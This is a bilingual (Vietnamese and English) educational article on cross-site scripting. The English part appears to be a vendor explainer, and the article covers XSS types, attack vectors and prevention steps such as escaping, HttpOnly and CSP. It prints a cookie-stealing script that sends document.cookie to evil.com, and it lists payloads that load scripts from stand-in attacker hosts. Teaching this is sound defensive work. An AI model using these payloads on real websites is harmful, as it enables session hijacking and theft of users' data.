Cross-site scripting – Cuộc tấn công XSS và Tip phòng tránh

1. CROSS-SITE SCRIPTING (XSS) LÀ GÌ?

- Cross-site scripting có thể hiểu là một dạng tấn công bảo mật vào trang web, hacker chèn các đoạn mã độc vào hệ thống thông qua các đoạn script và ăn cắp thông tin từ phía người dùng.

2. XSS LIỆU CÓ NGUY HIỂM?

- Tất nhiên rồi, bất cứ ai trong chúng ta đều không muốn thông tin của mình bị người khác đánh cắp (nghe danh hacker thì có mấy ai không rén cho được, đúng không . Nếu website của một doanh nghiệp bị tấn công thì sẽ gây ảnh hưởng đến cả chủ trang web (doanh nghiệp) cũng như người dùng trên trang web đó. Ngoài ra, hacker có thể sử dụng tài khoản của người dùng vào các mục đích xấu như lừa đảo,...

3. VẬY XSS ĐƯỢC CHIA THÀNH BAO NHIÊU LOẠI?

- Hiện nay XSS được chia làm ba loại chính:

Stored XSS:

Mã độc được lưu trữ và hiển thị trên trang web, khi người dùng truy cập vào trang web thì mã độc sẽ được thực thi.

Ví dụ, khi một bình luận với nội dung: <script>alert(‘XSS Attack!’);</script> được lưu và hiển thị trên trang web mà không có sự kiểm tra, xử lý nào, đoạn script này sẽ được thực thi khi người dùng truy cập vào trang web (Một hộp thoại với nội dung “XSS Attack!” sẽ xuất hiện).

Đây cũng là một cách kiểm tra cơ bản mà các tester (pentester) thực hiện kiểm tra bảo mật trang web của mình.

Reflected XSS:

Mã độc được chèn vào URL và gửi đến ứng dụng web. Ứng dụng web sẽ phản ánh (reflect) mã độc trở lại trong phản hồi. Khi người dùng truy cập vào URL chứa mã độc, mã độc sẽ được thực thi trong trình duyệt của họ.

Ví dụ, kẻ tấn cồ chèn 1 đoạn mã vào trường tìm kiếm, khi người dùng nhập từ khóa tìm kiến, mã độc sẽ phản hồi cho người dùng dưới dạng kết quả tìm kiếm (vd: http://example.com/search?q=<script>alert(‘XSS Attack!’);</script>). Và khi người dùng truy cập vào đường link chứa mã độc này thì mã độc được thực thi (một hộp thoại cảnh báo với nội dung “XSS Attack!” sẽ xuất hiện.).

DOM-based XSS:

Tấn công này xảy ra khi mã độc ảnh hưởng trực tiếp đến cấu trúc DOM (Document Object Model) trong trình duyệt. Mã độc sẽ thay đổi cấu trúc DOM để thực thi các hành động độc hại.

Ví dụ, URL thay đổi ngôn ngữ: “http://example.com/change-language?lang=<script>alert(‘XSS Attack!’);</script>”. Trong URL chứa mã độc và nếu không được kiểm tra thi khi người dùng truy cập vào đường dẫn này và thay đổi ngôn ngữ, mã độc sẽ được thực thi.

4. NGĂN CHẶN VÀ PHÒNG TRÁNH TẤN CÔNG XSS NHƯ THẾ NÀO?

• Sử dụng phương pháp kiểm tra và xử lý dữ liệu đầu vào: Sử dụng các bộ lọc và thư viện bảo mật để loại bỏ hoặc mã hóa các ký tự đặc biệt (HTML escaping).
• Sử dụng cơ chế tạo mã độc thân thiện: sử dụng whitelist-based filtering để chỉ chấp nhận các ký tự và từ hợp lệ.
• Set the HttpOnly flag: đặt HttpOnly flag cho cookie, lúc ày sẽ không thể truy cập cookie từ phía máy khách bằng Javascript.
• Thiết lập header HTTP hợp lệ: Thiết lập Content Security Policy (CSP) để ngăn chặn việc thực thi mã độc từ các nguồn không tin cậy.
• “Làm sạch” HTML bằng các thư viện đáng tin cậy khi không thể thực hiện escaping/encoding.
• Đào tạo và nâng cao nhận thức bảo mật cho nhân viên.
• Scan website thường xuyên: sửa dụng các công cụ hỗ trợ như Burp Suite, CyStack Platform – A Web Security Platform , Netsparker, W3af,...

TỔNG KẾT:

XSS là một lỗ hổng bảo mật nghiêm trọng có thể được sử dụng để đánh cắp thông tin người dùng, chiếm quyền điều khiển trang web và thực hiện các hành động độc hại khác. Vì vậy khi tạo trang web, dev cần phải thực hiện các biện pháp phòng tránh cũng như các tester cần phải đánh giá và thực hiện kiểm thử để đảm bảo rằng trang web của mình có thể an toàn trước các sự tấn công XSS.

Cross-site Scripting (XSS) is a client-side code injection attack. The attacker aims to execute malicious scripts in a web browser of the victim by including malicious code in a legitimate web page or web application. The actual attack occurs when the victim visits the web page or web application that executes the malicious code. The web page or web application becomes a vehicle to deliver the malicious script to the user’s browser. Vulnerable vehicles that are commonly used for Cross-site Scripting attacks are forums, message boards, and web pages that allow comments.

A web page or web application is vulnerable to XSS if it uses unsanitized user input in the output that it generates. This user input must then be parsed by the victim’s browser. XSS attacks are possible in VBScript, ActiveX, Flash, and even CSS. However, they are most common in JavaScript, primarily because JavaScript is fundamental to most browsing experiences.

“Isn’t Cross-site Scripting the User’s Problem?”

If an attacker can abuse an XSS vulnerability on a web page to execute arbitrary JavaScript in a user’s browser, the security of that vulnerable website or vulnerable web application and its users has been compromised. XSS is not the user’s problem like any other security vulnerability. If it is affecting your users, it affects you.

Cross-site Scripting may also be used to deface a website instead of targeting the user. The attacker can use injected scripts to change the content of the website or even redirect the browser to another web page, for example, one that contains malicious code.

What Can the Attacker Do with JavaScript?

XSS vulnerabilities are perceived as less dangerous than for example SQL Injection vulnerabilities. Consequences of the ability to execute JavaScript on a web page may not seem dire at first. Most web browsers run JavaScript in a very tightly controlled environment. JavaScript has limited access to the user’s operating system and the user’s files. However, JavaScript can still be dangerous if misused as part of malicious content:

• Malicious JavaScript has access to all the objects that the rest of the web page has access to. This includes access to the user’s cookies. Cookies are often used to store session tokens. If an attacker can obtain a user’s session cookie, they can impersonate that user, perform actions on behalf of the user, and gain access to the user’s sensitive data.
• JavaScript can read the browser DOM and make arbitrary modifications to it. Luckily, this is only possible within the page where JavaScript is running.
• JavaScript can use the XMLHttpRequest object to send HTTP requests with arbitrary content to arbitrary destinations.
• JavaScript in modern browsers can use HTML5 APIs. For example, it can gain access to the user’s geolocation, webcam, microphone, and even specific files from the user’s file system. Most of these APIs require user opt-in, but the attacker can use social engineering to go around that limitation.

The above, in combination with social engineering, allow criminals to pull off advanced attacks including cookie theft, planting trojans, keylogging, phishing, and identity theft. XSS vulnerabilities provide the perfect ground to escalate attacks to more serious ones. Cross-site Scripting can also be used in conjunction with other types of attacks, for example, Cross-Site Request Forgery (CSRF).

There are several types of Cross-site Scripting attacks: stored/persistent XSS, reflected/non-persistent XSS, and DOM-based XSS. You can read more about them in an article titled Types of XSS.

How Cross-site Scripting Works

There are two stages to a typical XSS attack:

1. To run malicious JavaScript code in a victim’s browser, an attacker must first find a way to inject malicious code (payload) into a web page that the victim visits.
2. After that, the victim must visit the web page with the malicious code. If the attack is directed at particular victims, the attacker can use social engineering and/or phishing to send a malicious URL to the victim.

For step one to be possible, the vulnerable website needs to directly include user input in its pages. An attacker can then insert a malicious string that will be used within the web page and treated as source code by the victim’s browser. There are also variants of XSS attacks where the attacker lures the user to visit a URL using social engineering and the payload is part of the link that the user clicks.

The following is a snippet of server-side pseudocode that is used to display the most recent comment on a web page:

print "<html>"
print "<h1>Most recent comment</h1>"
print database.latestComment
print "</html>"

The above script simply takes the latest comment from a database and includes it in an HTML page. It assumes that the comment printed out consists of only text and contains no HTML tags or other code. It is vulnerable to XSS, because an attacker could submit a comment that contains a malicious payload, for example:

<script>doSomethingEvil();</script>

The web server provides the following HTML code to users that visit this web page:

<html>
<h1>Most recent comment</h1>
<script>doSomethingEvil();</script>
</html>

When the page loads in the victim’s browser, the attacker’s malicious script executes. Most often, the victim does not realize it and is unable to prevent such an attack.

Stealing Cookies Using XSS

Criminals often use XSS to steal cookies. This allows them to impersonate the victim. The attacker can send the cookie to their own server in many ways. One of them is to execute the following client-side script in the victim’s browser:

<script>
window.location="http://evil.com/?cookie=" + document.cookie
</script>

The figure below illustrates a step-by-step walkthrough of a simple XSS attack.

1. The attacker injects a payload into the website’s database by submitting a vulnerable form with malicious JavaScript content.
2. The victim requests the web page from the web server.
3. The web server serves the victim’s browser the page with attacker’s payload as part of the HTML body.
4. The victim’s browser executes the malicious script contained in the HTML body. In this case, it sends the victim’s cookie to the attacker’s server.
5. The attacker now simply needs to extract the victim’s cookie when the HTTP request arrives at the server.
6. The attacker can now use the victim’s stolen cookie for impersonation.

To learn more about how XSS attacks are conducted, you can refer to an article titled A comprehensive tutorial on cross-site scripting.

Cross-site Scripting Attack Vectors

The following is a list of common XSS attack vectors that an attacker could use to compromise the security of a website or web application through an XSS attack. A more extensive list of XSS payload examples is maintained by the OWASP organization: XSS Filter Evasion Cheat Sheet.

<script> tag

The <script> tag is the most straightforward XSS payload. A script tag can reference external JavaScript code or you can embed the code within the script tag itself.

<!-- External script -->
<script src=http://evil.com/xss.js></script>
<!-- Embedded script -->
<script> alert("XSS"); </script>

JavaScript events

JavaScript event attributes such as onload and onerror can be used in many different tags. This is a very popular XSS attack vector.

<!-- onload attribute in the <body> tag -->
<body onload=alert("XSS")>

<body> tag

An XSS payload can be delivered inside the <body> by using event attributes (see above) or other more obscure attributes such as the background attribute.

<!-- background attribute -->
<body background="javascript:alert("XSS")">

<img> tag

Some browsers execute JavaScript found in the <img> attributes.

<!-- <img> tag XSS -->
<img src="javascript:alert("XSS");">
<!--  tag XSS using lesser-known attributes -->
<img dynsrc="javascript:alert('XSS')">
<img lowsrc="javascript:alert('XSS')">

<iframe> tag

The <iframe> tag lets you embed another HTML page in the current page. An IFrame may contain JavaScript but JavaScript in the IFrame does not have access to the DOM of the parent page due to the Content Security Policy (CSP) of the browser. However, IFrames are still very effective for pulling off phishing attacks.

<!-- <iframe> tag XSS -->
<iframe src="http://evil.com/xss.html">

<input> tag

In some browsers, if the type attribute of the <input> tag is set to image, it can be manipulated to embed a script.

<!-- <input> tag XSS -->
<input type="image" src="javascript:alert('XSS');">

<link> tag

The <link> tag, which is often used to link to external style sheets, may contain a script.

<!-- <link> tag XSS -->
<link rel="stylesheet" href="javascript:alert('XSS');">

<table> tag

The background attribute of the <table> and <td> tags can be exploited to refer to a script instead of an image.

<!-- <table> tag XSS -->
<table background="javascript:alert('XSS')">
<!-- <td> tag XSS -->
<td background="javascript:alert('XSS')">

<div> tag

The <div> tag, similar to the <table> and <td> tags, can also specify a background and therefore embed a script.

<!-- <div> tag XSS -->
<div style="background-image: url(javascript:alert('XSS'))">
<!-- <div> tag XSS -->
<div style="width: expression(alert('XSS'));">

<object> tag

The <object> tag can be used to include a script from an external site.

<!-- <object> tag XSS -->
<object type="text/x-scriptlet" data="http://hacker.com/xss.html">

Is Your Website or Web Application Vulnerable to Cross-site Scripting

Cross-site Scripting vulnerabilities are one of the most common web application vulnerabilities. The OWASP organization (Open Web Application Security Project) lists XSS vulnerabilities in their OWASP Top 10 2017 document as the second most prevalent issue.

Fortunately, it’s easy to test if your website or web application is vulnerable to XSS and other vulnerabilities by running an automated web scan using the Acunetix vulnerability scanner, which includes a specialized XSS scanner module. Take a demo and find out more about running XSS scans against your website or web application. An example of how you can detect blind XSS vulnerabilities with Acunetix is available in the following article: How to Detect Blind XSS Vulnerabilities.

How to Prevent XSS

To keep yourself safe from XSS, you must sanitize your input. Your application code should never output data received as input directly to the browser without checking it for malicious code.

For more details, refer to the following articles: Preventing XSS Attacks and How to Prevent DOM-based Cross-site Scripting. You can also find useful information in the XSS Prevention Cheat Sheet maintained by the OWASP organization.

How to Prevent Cross-site Scripting (XSS) – Generic Tips

Preventing Cross-site Scripting (XSS) is not easy. Specific prevention techniques depend on the subtype of XSS vulnerability, on user input usage context, and on the programming framework. However, there are certain general strategic principles that you should follow to keep your web application safe.

Step 1: Train and maintain awareness

To keep your web application safe, everyone involved in building the web application must be aware of the risks associated with XSS vulnerabilities. You should provide suitable security training to all your developers, QA staff, DevOps, and SysAdmins. You can start by referring them to this page.

Step 2: Don’t trust any user input

Treat all user input as untrusted. Any user input that is used as part of HTML output introduces a risk of an XSS. Treat input from authenticated and/or internal users the same way that you treat public input.

Step 3: Use escaping/encoding

Use an appropriate escaping/encoding technique depending on where user input is to be used: HTML escape, JavaScript escape, CSS escape, URL escape, etc. Use existing libraries for escaping, don’t write your own unless absolutely necessary.

Step 4: Sanitize HTML

If the user input needs to contain HTML, you can’t escape/encode it because it would break valid tags. In such cases, use a trusted and verified library to parse and clean HTML. Choose the library depending on your development language, for example, HtmlSanitizer for .NET or SanitizeHelper for Ruby on Rails.

Step 5: Set the HttpOnly flag

To mitigate the consequences of a possible XSS vulnerability, set the HttpOnly flag for cookies. If you do, such cookies will not be accessible via client-side JavaScript.

Step 6: Use a Content Security Policy

To mitigate the consequences of a possible XSS vulnerability, also use a Content Security Policy (CSP). CSP is an HTTP response header that lets you declare the dynamic resources that are allowed to load depending on the request source.

Step 7: Scan regularly (with Acunetix)

XSS vulnerabilities may be introduced by your developers or through external libraries/modules/software. You should regularly scan your web applications using a web vulnerability scanner such as Acunetix. If you use Jenkins, you should install the Acunetix plugin to automatically scan every build.